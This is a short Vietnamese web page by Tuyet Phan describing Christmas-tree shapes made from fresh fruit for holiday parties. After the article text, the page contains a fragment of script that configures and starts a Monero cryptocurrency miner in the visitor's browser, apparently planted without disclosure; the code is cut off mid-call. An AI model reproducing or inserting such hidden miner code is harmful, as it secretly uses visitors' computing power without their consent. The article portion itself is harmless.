Những cây thông ngon , đẹp - Tuyet Phan -

Những cây thông ngon , đẹp

        Tuyet Phan
Dưới bàn tay của những người nội trợ ưa sáng tạo, chỉ cần vài nguyên liệu đơn giản và các loại trái cây tươi ngon là họ đã có hình cây thông cực đẹp mắt cho bữa tiệc Giáng sinh. 


', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();